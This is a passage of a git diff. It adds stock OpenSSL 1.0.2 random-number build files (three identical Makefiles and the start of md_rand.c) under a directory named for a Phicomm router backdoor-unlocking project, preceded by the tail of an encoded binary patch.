zoZp-?b7pqmNtwNVpN~oLu~*o`nM4^Iee9tg6KafU>~Z!WwDtE9?)-VB55TLP&<%6v
z0l)A9+6>*po>%Mk6TCLUxHB5$*JHW>9sSVw<Py5`>Z;xPJ%VC7bY&9Mt7t_u4VHDG
zgZ0oxcF4;uK9Y*wk7v@(FBs175U*|H)mxPg)3Mk}pPk^fq@H$eV=z0ovveg0{HF6A
zcfJwy)%xjMX=h@)-e0|Mf8Os{`pTyC^`7k_Sksx-R|2W%@*&f?Gd>xgh*RXXHaC=7
z8}hdC+Mv#z4uQop5XY~>W^G4*b=lsTt^v1Llsi9|&Rxpsmfa4H>(kEHE4Qn4GnD$4
zRuCK`{K75>lMTlQ-E{2kp3vgH7U+@zQ2e3AVP9x*&q40|2vFM~bnCEd9gNo96>8%;
zU$_=t`E*q7HpLvR<GzQuN9erPfnUG0gS>V?U#+h^SSlT_SQX2dX0x`HZ+|AT`^3LB
zsFl8C^5t;X$W*0ZSHj)K9wV|V`eH>)qo;RAjL6=dE{yqsv_QkXZiUvje}wrNt0NYG
zhO*fmnD5j9<~yPLwrpq%z7K`E9q^~=+p9RHH2ti9zt*`B*r$bG*E-{x9@m0`yNB#T
zG$Q9H>0LO2?-bdV2$!~dVg4RrHjcfTe!-v8I?o4swD8%M9<6JkHLgYcuW4NX#I??Z
zrYE!@=JW~q1!+X=2I(>{Tz{D`5hw7U_XEvY<X>p1h)jSGY%ms`E@=jRM9v&@PGHVm
zT#KZ%mr`16Kno`uTOjs;lV5Wz6NGI+E)a~bL|BJF{<%Z57WVV1mqozyCBZY5r@GcF
zAgW+3hO>aE3NO6v@1U@k*{%H?VC`!Gn7PjyR^3{0&%M>d1LIk@));1Zj+>hD6}1T1
zR%p1Ns)#dGL6|3?A&>Nz_16!$7ta{k?}rfu>j>otG~{_x%ovkACBmzO+cchr(TgAL
zkmonDlRNtX;qs>g^GEpz8rnZe^&@H-u#1F`5uSlL$|Y!C>*Ae3o{!01uKNYymk5_N
zdz0`Rgg5H8@p2hvGQyyXvJyUG*@E>J%l4TAiMW{^=<OX&WwM!g!c1jZ^1#?&W+0o-
z&CM03$$F-2S@MI>U0%ULYBM}rn77I{%Uk*Be2I}k$+C_$^kM^^nJpY?z~$M3%}UtM
zNDQJa=j>ux&I{HFFcA-Oc7FDh1(`GUl;|10o1$j_SaoF^;Vm#~&?J7CaMj*rbKm1;
z`)g#6Jb2cUr<?X$#dCxsKi)BE|6!9o#w_tP=qSj8^&s&xprfdGSfFmcxP}x?3S!vg
zJ(^H(d0%AxOM7`=&MEftzSI?5-ixmkT;7X&3NG)(=BE9@wdK7q6<pT;VFj1<Z!5U0
ze`d^|%-gvs811q<9+g_zn#&nBR*`WeXXltPH9yacauFwJ9yOxOm@ek?7Sy6qDB6|*
zKgql1?cDS+n!iz~7^QNt1Vw%lT#?W^nw=@<^0I&^??)ZN;E1WIFKrAkl)IF-J9BNN
zjw8McSTiwb&GH%jWc)<ndKi&PzAyL>7UfxJh^xO;JMgePL<xsI4>rj8sQyv#Mb6#O
znnkW3X$C=;>&r1lm}+;B;(zWx{P8|Yu4dDB|7ZSV;DlSPnx7*e+)N6(+<yrl2L;zx
z{Vx)5MhQ;!p95d7^S?}nVe-fG$A1OVU!K3$+F-`IkQC%H#jyc&Y^pzUs%H-nyF&%N
ZjFTo&(qS9no0tDhBnElg9U8sr{}=c-?{5GA

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/Makefile
new file mode 100644
index 0000000..44fac94
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/Makefile
@@ -0,0 +1,158 @@
+#
+# OpenSSL/crypto/rand/Makefile
+#
+
+DIR=	rand
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST= randtest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=md_rand.c randfile.c rand_lib.c rand_err.c rand_egd.c \
+	rand_win.c rand_unix.c rand_os2.c rand_nw.c
+LIBOBJ=md_rand.o randfile.o rand_lib.o rand_err.o rand_egd.o \
+	rand_win.o rand_unix.o rand_os2.o rand_nw.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= rand.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+md_rand.o: ../../e_os.h ../../include/openssl/asn1.h
+md_rand.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+md_rand.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+md_rand.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+md_rand.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+md_rand.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+md_rand.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+md_rand.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+md_rand.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+md_rand.o: md_rand.c rand_lcl.h
+rand_egd.o: ../../include/openssl/buffer.h ../../include/openssl/e_os2.h
+rand_egd.o: ../../include/openssl/opensslconf.h
+rand_egd.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+rand_egd.o: rand_egd.c
+rand_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+rand_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rand_err.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rand_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_err.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rand_err.o: rand_err.c
+rand_lib.o: ../../e_os.h ../../include/openssl/bio.h
+rand_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rand_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rand_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rand_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_lib.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rand_lib.o: ../cryptlib.h rand_lib.c
+rand_nw.o: ../../e_os.h ../../include/openssl/asn1.h
+rand_nw.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rand_nw.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rand_nw.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rand_nw.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rand_nw.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rand_nw.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_nw.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_nw.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rand_nw.o: ../../include/openssl/symhacks.h ../cryptlib.h rand_lcl.h rand_nw.c
+rand_os2.o: ../../e_os.h ../../include/openssl/asn1.h
+rand_os2.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rand_os2.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rand_os2.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rand_os2.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rand_os2.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rand_os2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_os2.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_os2.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rand_os2.o: ../../include/openssl/symhacks.h ../cryptlib.h rand_lcl.h
+rand_os2.o: rand_os2.c
+rand_unix.o: ../../e_os.h ../../include/openssl/asn1.h
+rand_unix.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rand_unix.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rand_unix.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rand_unix.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rand_unix.o: ../../include/openssl/objects.h
+rand_unix.o: ../../include/openssl/opensslconf.h
+rand_unix.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_unix.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_unix.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rand_unix.o: ../../include/openssl/symhacks.h ../cryptlib.h rand_lcl.h
+rand_unix.o: rand_unix.c
+rand_win.o: ../../e_os.h ../../include/openssl/asn1.h
+rand_win.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rand_win.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rand_win.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rand_win.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rand_win.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rand_win.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_win.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_win.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rand_win.o: ../../include/openssl/symhacks.h ../cryptlib.h rand_lcl.h
+rand_win.o: rand_win.c
+randfile.o: ../../e_os.h ../../include/openssl/buffer.h
+randfile.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+randfile.o: ../../include/openssl/opensslconf.h
+randfile.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+randfile.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+randfile.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+randfile.o: randfile.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/Makefile.bak
new file mode 100644
index 0000000..44fac94
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/Makefile.bak
@@ -0,0 +1,158 @@
+#
+# OpenSSL/crypto/rand/Makefile
+#
+
+DIR=	rand
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST= randtest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=md_rand.c randfile.c rand_lib.c rand_err.c rand_egd.c \
+	rand_win.c rand_unix.c rand_os2.c rand_nw.c
+LIBOBJ=md_rand.o randfile.o rand_lib.o rand_err.o rand_egd.o \
+	rand_win.o rand_unix.o rand_os2.o rand_nw.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= rand.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+md_rand.o: ../../e_os.h ../../include/openssl/asn1.h
+md_rand.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+md_rand.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+md_rand.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+md_rand.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+md_rand.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+md_rand.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+md_rand.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+md_rand.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+md_rand.o: md_rand.c rand_lcl.h
+rand_egd.o: ../../include/openssl/buffer.h ../../include/openssl/e_os2.h
+rand_egd.o: ../../include/openssl/opensslconf.h
+rand_egd.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+rand_egd.o: rand_egd.c
+rand_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+rand_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rand_err.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rand_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_err.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rand_err.o: rand_err.c
+rand_lib.o: ../../e_os.h ../../include/openssl/bio.h
+rand_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rand_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rand_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rand_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_lib.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rand_lib.o: ../cryptlib.h rand_lib.c
+rand_nw.o: ../../e_os.h ../../include/openssl/asn1.h
+rand_nw.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rand_nw.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rand_nw.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rand_nw.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rand_nw.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rand_nw.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_nw.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_nw.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rand_nw.o: ../../include/openssl/symhacks.h ../cryptlib.h rand_lcl.h rand_nw.c
+rand_os2.o: ../../e_os.h ../../include/openssl/asn1.h
+rand_os2.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rand_os2.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rand_os2.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rand_os2.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rand_os2.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rand_os2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_os2.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_os2.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rand_os2.o: ../../include/openssl/symhacks.h ../cryptlib.h rand_lcl.h
+rand_os2.o: rand_os2.c
+rand_unix.o: ../../e_os.h ../../include/openssl/asn1.h
+rand_unix.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rand_unix.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rand_unix.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rand_unix.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rand_unix.o: ../../include/openssl/objects.h
+rand_unix.o: ../../include/openssl/opensslconf.h
+rand_unix.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_unix.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_unix.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rand_unix.o: ../../include/openssl/symhacks.h ../cryptlib.h rand_lcl.h
+rand_unix.o: rand_unix.c
+rand_win.o: ../../e_os.h ../../include/openssl/asn1.h
+rand_win.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rand_win.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rand_win.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rand_win.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rand_win.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rand_win.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_win.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_win.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rand_win.o: ../../include/openssl/symhacks.h ../cryptlib.h rand_lcl.h
+rand_win.o: rand_win.c
+randfile.o: ../../e_os.h ../../include/openssl/buffer.h
+randfile.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+randfile.o: ../../include/openssl/opensslconf.h
+randfile.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+randfile.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+randfile.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+randfile.o: randfile.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/Makefile.save
new file mode 100644
index 0000000..44fac94
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/Makefile.save
@@ -0,0 +1,158 @@
+#
+# OpenSSL/crypto/rand/Makefile
+#
+
+DIR=	rand
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST= randtest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=md_rand.c randfile.c rand_lib.c rand_err.c rand_egd.c \
+	rand_win.c rand_unix.c rand_os2.c rand_nw.c
+LIBOBJ=md_rand.o randfile.o rand_lib.o rand_err.o rand_egd.o \
+	rand_win.o rand_unix.o rand_os2.o rand_nw.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= rand.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+md_rand.o: ../../e_os.h ../../include/openssl/asn1.h
+md_rand.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+md_rand.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+md_rand.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+md_rand.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+md_rand.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+md_rand.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+md_rand.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+md_rand.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+md_rand.o: md_rand.c rand_lcl.h
+rand_egd.o: ../../include/openssl/buffer.h ../../include/openssl/e_os2.h
+rand_egd.o: ../../include/openssl/opensslconf.h
+rand_egd.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+rand_egd.o: rand_egd.c
+rand_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+rand_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rand_err.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rand_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_err.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rand_err.o: rand_err.c
+rand_lib.o: ../../e_os.h ../../include/openssl/bio.h
+rand_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rand_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rand_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rand_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_lib.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rand_lib.o: ../cryptlib.h rand_lib.c
+rand_nw.o: ../../e_os.h ../../include/openssl/asn1.h
+rand_nw.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rand_nw.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rand_nw.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rand_nw.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rand_nw.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rand_nw.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_nw.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_nw.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rand_nw.o: ../../include/openssl/symhacks.h ../cryptlib.h rand_lcl.h rand_nw.c
+rand_os2.o: ../../e_os.h ../../include/openssl/asn1.h
+rand_os2.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rand_os2.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rand_os2.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rand_os2.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rand_os2.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rand_os2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_os2.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_os2.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rand_os2.o: ../../include/openssl/symhacks.h ../cryptlib.h rand_lcl.h
+rand_os2.o: rand_os2.c
+rand_unix.o: ../../e_os.h ../../include/openssl/asn1.h
+rand_unix.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rand_unix.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rand_unix.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rand_unix.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rand_unix.o: ../../include/openssl/objects.h
+rand_unix.o: ../../include/openssl/opensslconf.h
+rand_unix.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_unix.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_unix.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rand_unix.o: ../../include/openssl/symhacks.h ../cryptlib.h rand_lcl.h
+rand_unix.o: rand_unix.c
+rand_win.o: ../../e_os.h ../../include/openssl/asn1.h
+rand_win.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rand_win.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rand_win.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rand_win.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rand_win.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rand_win.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rand_win.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+rand_win.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rand_win.o: ../../include/openssl/symhacks.h ../cryptlib.h rand_lcl.h
+rand_win.o: rand_win.c
+randfile.o: ../../e_os.h ../../include/openssl/buffer.h
+randfile.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+randfile.o: ../../include/openssl/opensslconf.h
+randfile.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+randfile.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+randfile.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+randfile.o: randfile.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/md_rand.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/md_rand.c
new file mode 100644
index 0000000..5c13d57
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/md_rand.c
@@ -0,0 +1,592 @@
+/* crypto/rand/md_rand.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
